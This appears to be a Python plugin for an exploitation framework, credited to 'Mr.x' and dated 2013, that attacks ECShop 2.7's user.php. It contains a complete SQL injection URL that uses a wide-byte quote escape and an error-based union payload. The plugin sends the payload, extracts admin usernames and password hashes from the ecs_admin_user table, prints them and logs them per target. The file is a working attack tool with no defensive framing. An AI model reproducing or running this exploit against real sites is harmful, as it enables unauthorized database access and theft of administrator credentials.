# -*- coding: utf-8 -*-
class mstplugin:
    infos = [
        ['Plugin','ecshop_2.7_user.php_SQLInject'],
        ['Author','Mr.x'],
        ['Update','2013/11/5'],
        ['QQ','414106785']
        ]
    opts  = [
        ['URL','localhost','Url'],
        ['PATH','/','Cms path'],
        ['PORT','80','port']
        ]
    def exploit(self):
        url = fuck.urlformate(URL,PORT,PATH)
        exp_name = url+"/user.php?act=is_registered&username=%ce%27%20and%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x7c,password,0x5d%29%20FROM%20ecs_admin_user%20limit%202,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23"
        color.cprint("[*] Inject ..",YELLOW)
        ok  = fuck.urlget(exp_name)
        if ok.getcode() == 200:
            tmp=fuck.find("\w+[|]\w{32}",ok.read())
            if len(tmp)>0:
                color.cprint("[*] Exploit Successful !",GREEN)
                color.cprint('[*] '+tmp[0],GREEN)
                fuck.writelog("ecshop_2.7_user.php_SQLInject",URL+"::"+tmp[0])
            else:
                color.cprint("[!] TARGET NO VULNERABLE !",RED)
        else:
            color.cprint("[!] EXPLOIT FALSE ! CODE:%s"%ok.getcode(),RED)
